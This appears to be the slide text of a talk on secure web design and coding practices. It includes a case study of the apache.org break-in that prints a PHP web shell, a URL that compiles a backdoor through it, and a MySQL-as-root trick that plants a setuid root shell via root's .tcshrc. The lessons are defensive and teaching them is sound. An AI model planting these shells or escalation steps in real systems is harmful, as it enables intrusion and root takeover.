Download - Security and Web Programming/Design
Security and Web Programming/Design
cell phones
bio-facilities
Sodas, junk food, and coffee
Welcome to the No Smoking State
who are you?
where are you from?
what do you do?
Emacs or vi?
Warm Fuzzies
Secure Design and Implementation
Wordage
Security Concepts
Vetting Software
Design Strategy
Developer practices
Coding Practices
Operational Practices
Security Concepts
trust
transitive trust
principle of least privilege
enumerating badness
“best block: not be there”
-- Mr. Miyage
“defense in depth”
threats
vulnerabilities
risks
who accepts the risk?
being paranoid
confidentiality
integrity
availability
protect what you can
detect what you can’t prevent
hammers, nails...
a security mechanism is design to protect against a specific
finite set of attacks.
It usually fails gloriously when modified or used for
other purposes.
don’t design your own new security protocol
the law of unintended consequences
don’t rely on the environment for protection
don’t rely on good behavior
don’t rely on things you can’t control
how apache.org got pwn3d
ftproot == wwwroot
webuser == o+w
upload php via ftp
<? passthru($cmd); ?>
upload backdoor code
compile and execute via http
http://www.apache.org/thatdir/wuh.php3?cmd=gcc+-o+httpd+httpd.c
voila! shell on web server
bugzilla talking to mysql
mysql running as root
mysql username/password stored script
create table with text field
insert:
#!/bin/shcp /bin/sh /tmp/.rootshchmod 4755 /tmp/.rootshrm -f /root/.tcshrc
query: SELECT ... INTO ‘/root/.tchsrc’
wait for someone to “su -”
Security Vetting
What is it supposed to do?
How does it work?
What side effects are there?
How is it deployed and maintained?
How does it fail?
What is the risk?
Can it be mitigated?
usability and security
understanding
caring
under-budget
security is an enabling task
It is especially important for expert programmers to internalize this habit, for two reasons. One is that expert programmers are disproportionately drawn from the high end of the bell curve in their working-set size; therefore they tend to systematically overestimate the amount of complexity other people can handle easily.
-- Eric S. Raymond, The Art of Unix Usability
Design Strategy
top down design
goals
requirements
design
review
what is the end result?
what problem trying to solve?
*not* how it is implemented
security
usability
performance
environmental
support
deployment
political
external
as simple as possible to meet the requirements
add requirements if apparent during design
be prepared to change when requirements can’t be met
for each security control
what threat is addressed?
Really?
recent examples
Developer Practices
The three virtues of a programmer are laziness, impatience, and hubris.
-- Larry Wall
Group permissions and accounts
Code Safety
Test Environment
Regression Testing
Coding Practices
bounds checking
input validation
no client-side trust
error checking
sql injection
cross-site scripting
credential handling
data mapping
logging
don’t require shell for remote execution
Operational Practices
Server accounts and permissions
handling credentials
accountability
software maintenance
documentation
testing and debugging